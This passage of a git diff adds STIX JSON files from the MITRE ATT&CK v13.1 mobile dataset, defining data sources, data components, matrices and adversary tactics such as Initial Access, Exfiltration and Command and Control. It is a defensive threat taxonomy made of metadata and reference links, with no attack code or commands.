@@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--d1fa7cb9-a729-40ac-b928-625913f34835", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-13T20:47:52.557Z", + "name": "System Notifications", + "description": "Notifications generated by the OS", + "x_mitre_data_source_ref": "x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "created": "2023-03-13T20:47:52.557Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456.json new file mode 100644 index 0000000000000000000000000000000000000000..7726d9a5436ce0f81277c7cd2207fe581fe0815f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456.json 
@@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--7120e9bd-cb23-4f48-9d8c-612e9e02c791", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-13T20:47:24.038Z", + "name": "Permissions Request", + "description": "System prompts triggered when an application requests new or additional permissions", + "x_mitre_data_source_ref": "x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456", + "created": "2023-03-13T20:47:24.038Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1.json new file mode 100644 index 0000000000000000000000000000000000000000..825447db21b3cb6078575a422e33f0d21f1869fb --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--0a1effba-3584-4425-86dd-607896b5668e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Metadata", + "description": "Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159.json new file mode 100644 index 0000000000000000000000000000000000000000..4c29ef93b0e604633c3648642c577b6af2b8cde2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--70f69f14-8725-4bb8-80e4-fc71bd65f6df", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:40.409Z", + "name": "Sensor Health", + "description": "Information from host telemetry providing insights about system status, errors, or other notable functional activity", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0013", + "external_id": "DS0013" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8.json new file mode 100644 index 0000000000000000000000000000000000000000..7f265ca93810089ae9989d14c5bdd354e73713c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8.json 
@@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--3ecebfce-4aec-4ea6-b060-17661c3a6cc3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-13T19:36:25.108Z", + "name": "User Interface", + "description": "Visual activity on the device that could alert the user to potentially malicious behavior.", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_collection_layers": [ + "Device" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8", + "created": "2023-03-13T19:36:25.108Z", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0042", + "external_id": "DS0042" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json new file mode 100644 index 0000000000000000000000000000000000000000..39a11ffd1dbed79eb7eacc33e85818dccffa9b49 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json 
@@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--f1bfe9e1-f359-4d38-963a-2adc8db6aec6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:00.625Z", + "name": "Command", + "description": "A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX)", + "x_mitre_platforms": [ + "Containers", + "Linux", + "Network", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Austin Clark, @c2defense" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0017", + "external_id": "DS0017" + }, + { + "source_name": "Confluence Linux Command Line", + "description": "Confluence Support. (2021, September 8). How to enable command line audit logging in linux. Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html" + }, + { + "source_name": "Audit OSX", + "description": "Gagliardi, R. (n.d.). Audit in a OS X System. Retrieved September 23, 2021.", + "url": "https://www.scip.ch/en/?labs.20150108" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json new file mode 100644 index 0000000000000000000000000000000000000000..346244bcc49f75d08b7d0c6e1a6357cffdef44aa --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--d0961e83-23a6-4dad-8404-58121f6ec8c3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:13.356Z", + "name": "Network Traffic", + "description": "Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)", + "x_mitre_platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "ExtraHop" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host", + "Network" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0029", + "external_id": "DS0029" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203.json new file mode 100644 index 0000000000000000000000000000000000000000..df30d533176b8326b2f3739652d7a2917834e3ab --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--5468b4df-44d1-4b46-8475-04d49be5227f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-13T19:30:41.131Z", + "name": "Application Vetting", + "description": "Application vetting report generated by an external cloud service.", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_collection_layers": [ + "Report" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "created": "2023-03-13T19:30:41.131Z", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0041", + "external_id": "DS0041" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json new file mode 100644 index 0000000000000000000000000000000000000000..80e3a04526cbf533794603022b5121c01c404da7 
--- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--5e7c5799-7e20-4ef2-8eb3-8c613bc21759", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:26.515Z", + "name": "Process", + "description": "Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0009", + "external_id": "DS0009" + }, + { + "source_name": "Microsoft Processes and Threads", + "description": "Microsoft. (2018, May 31). Processes and Threads. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-matrix/x-mitre-matrix--5104d5f0-16b7-4aec-8ae3-0a90cd5494fc.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-matrix/x-mitre-matrix--5104d5f0-16b7-4aec-8ae3-0a90cd5494fc.json new file mode 100644 index 0000000000000000000000000000000000000000..f4843933859050ec61fc12022dffe17601994d74 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-matrix/x-mitre-matrix--5104d5f0-16b7-4aec-8ae3-0a90cd5494fc.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--be196bb6-cf38-4f9d-a5f3-62f4637aa72a", + "spec_version": "2.0", + "objects": [ + { + "tactic_refs": [ + "x-mitre-tactic--9eb4c21e-4fa8-44c9-b167-dbfc455f9210", + "x-mitre-tactic--e78d7d60-41b5-49b7-b0a9-5c5d4cbabe17" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "x-mitre-matrix", + "id": "x-mitre-matrix--5104d5f0-16b7-4aec-8ae3-0a90cd5494fc", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "mobile-attack", + "url": "https://attack.mitre.org/matrices/mobile-attack" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Below are the tactics and techniques representing the two MITRE ATT&CK Matrices for Mobile. The Matrices cover techniques involving device access and network-based effects that can be used by adversaries without device access. The Matrices contains information for the following platforms: Android, iOS.", + "modified": "2022-04-06T15:44:04.736Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network-Based Effects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-matrix/x-mitre-matrix--a382db5e-d009-4135-b893-0e0ff021c95b.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-matrix/x-mitre-matrix--a382db5e-d009-4135-b893-0e0ff021c95b.json new file mode 100644 index 0000000000000000000000000000000000000000..5bb3a5649a43f123dddf0f7df3e1fcac4540980f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-matrix/x-mitre-matrix--a382db5e-d009-4135-b893-0e0ff021c95b.json 
@@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--52e0f65f-4996-4c47-bddc-a955e1c146f9", + "spec_version": "2.0", + "objects": [ + { + "tactic_refs": [ + "x-mitre-tactic--0a93fd8e-4a83-4c15-8203-db290e5f2ac6", + "x-mitre-tactic--4a800987-a3a8-4d56-a1bd-0d7171431756", + "x-mitre-tactic--363bbeff-bb2a-4734-ac74-d6d37202fe54", + "x-mitre-tactic--3e962de5-3280-43b7-bc10-334fbc1d6fa8", + "x-mitre-tactic--987cda6d-eb77-406b-bf68-bcb5f3d2e1df", + "x-mitre-tactic--6fcb36b8-3776-483b-8699-42215714fb10", + "x-mitre-tactic--d418cdeb-1b9f-4a6b-a15d-2f89f549f8c1", + "x-mitre-tactic--7be441c2-0095-4b1e-8125-fa8ffda29b0f", + "x-mitre-tactic--7a0d25d3-f0c0-40bf-bf90-c743871b19ba", + "x-mitre-tactic--3f660805-fa2e-42e8-8851-57f9e9b653e3", + "x-mitre-tactic--10fa8d8d-1b04-4176-917e-738724239981", + "x-mitre-tactic--6ebce653-294a-444a-bffb-14c04c8d137e" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "x-mitre-matrix", + "id": "x-mitre-matrix--a382db5e-d009-4135-b893-0e0ff021c95b", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "mobile-attack", + "url": "https://attack.mitre.org/matrices/mobile-attack" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Below are the tactics and technique representing the MITRE ATT&CK Matrix for Mobile. The Matrix contains information for the following platforms: Android, iOS.", + "modified": "2022-04-06T15:43:22.080Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Mobile ATT&CK", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--0a93fd8e-4a83-4c15-8203-db290e5f2ac6.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--0a93fd8e-4a83-4c15-8203-db290e5f2ac6.json new file mode 100644 index 0000000000000000000000000000000000000000..ee384fbbc1bb3d1b16f12e9042cf7147e7c9d8c6 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--0a93fd8e-4a83-4c15-8203-db290e5f2ac6.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--efaa34ae-128a-4eb3-a11c-11b128e17a15", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--0a93fd8e-4a83-4c15-8203-db290e5f2ac6", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0027", + "url": "https://attack.mitre.org/tactics/TA0027", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:02:36.744Z", + "name": "Initial Access", + "description": "The adversary is trying to get into your device.\n\nThe initial access tactic represents the vectors adversaries use to gain an initial foothold onto a mobile device.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "initial-access" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--10fa8d8d-1b04-4176-917e-738724239981.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--10fa8d8d-1b04-4176-917e-738724239981.json new file mode 100644 index 0000000000000000000000000000000000000000..5e98321260189c4a1ce25278c09e21306e671006 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--10fa8d8d-1b04-4176-917e-738724239981.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--a51ac7ef-bf20-43c3-9d29-fd6b24ff1cfd", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--10fa8d8d-1b04-4176-917e-738724239981", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0036", + "url": "https://attack.mitre.org/tactics/TA0036", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:06:42.009Z", + "name": "Exfiltration", + "description": "The adversary is trying to steal data.\n\nExfiltration refers to techniques and attributes that result or aid in the adversary removing files and information from the targeted mobile device.\n\nIn the mobile environment, mobile devices are frequently connected to networks outside enterprise control such as cellular networks or public Wi-Fi networks. Adversaries could attempt to evade detection by communicating on these networks, and potentially even by using non-Internet Protocol mechanisms such as Short Message Service (SMS). However, cellular networks often have data caps and/or extra data charges that could increase the potential for adversarial communication to be detected.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "exfiltration" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--363bbeff-bb2a-4734-ac74-d6d37202fe54.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--363bbeff-bb2a-4734-ac74-d6d37202fe54.json new file mode 100644 index 0000000000000000000000000000000000000000..64a141a58197751c01ab2cf2e9ebb98a2db804b2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--363bbeff-bb2a-4734-ac74-d6d37202fe54.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--c696cc12-32dc-4f36-904d-d2d3160610d4", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--363bbeff-bb2a-4734-ac74-d6d37202fe54", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0028", + "url": "https://attack.mitre.org/tactics/TA0028", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:03:15.455Z", + "name": "Persistence", + "description": " The adversary is trying to maintain their foothold.\n\nPersistence is any access, action, or configuration change to a mobile device that gives an attacker a persistent presence on the device. Attackers often will need to maintain access to mobile devices through interruptions such as device reboots and potentially even factory data resets.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "persistence" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--3e962de5-3280-43b7-bc10-334fbc1d6fa8.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--3e962de5-3280-43b7-bc10-334fbc1d6fa8.json new file mode 100644 index 0000000000000000000000000000000000000000..dc35918e76a4ea99b44bebe82fa26998f8f89a92 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--3e962de5-3280-43b7-bc10-334fbc1d6fa8.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--fda64103-db36-4894-bd9d-0ad5cf812e8f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--3e962de5-3280-43b7-bc10-334fbc1d6fa8", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0029", + "url": "https://attack.mitre.org/tactics/TA0029", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:03:49.343Z", + "name": "Privilege Escalation", + "description": " The adversary is trying to gain higher-level permissions.\n\nPrivilege escalation includes techniques that allow an attacker to obtain a higher level of permissions on the mobile device. Attackers may enter the mobile device with very limited privileges and may be required to take advantage of a device weakness to obtain higher privileges necessary to successfully carry out their mission objectives.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "privilege-escalation" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--3f660805-fa2e-42e8-8851-57f9e9b653e3.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--3f660805-fa2e-42e8-8851-57f9e9b653e3.json new file mode 100644 index 0000000000000000000000000000000000000000..b42b211de206a467fd5363df979c19aca39c2ade --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--3f660805-fa2e-42e8-8851-57f9e9b653e3.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--3df1208e-3dc6-4bb9-a03d-ebbe96660545", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--3f660805-fa2e-42e8-8851-57f9e9b653e3", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0037", + "url": "https://attack.mitre.org/tactics/TA0037", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:06:59.132Z", + "name": "Command and Control", + "description": "The adversary is trying to communicate with compromised devices to control them.\n\nThe command and control tactic represents how adversaries communicate with systems under their control within a target network. There are many ways an adversary can establish command and control with various levels of covertness, depending on system configuration and network topology. Due to the wide degree of variation available to the adversary at the network level, only the most common factors were used to describe the differences in command and control. There are still a great many specific techniques within the documented methods, largely due to how easy it is to define new protocols and use existing, legitimate protocols and network services for communication. \n\nThe resulting breakdown should help convey the concept that detecting intrusion through command and control protocols without prior knowledge is a difficult proposition over the long term. 
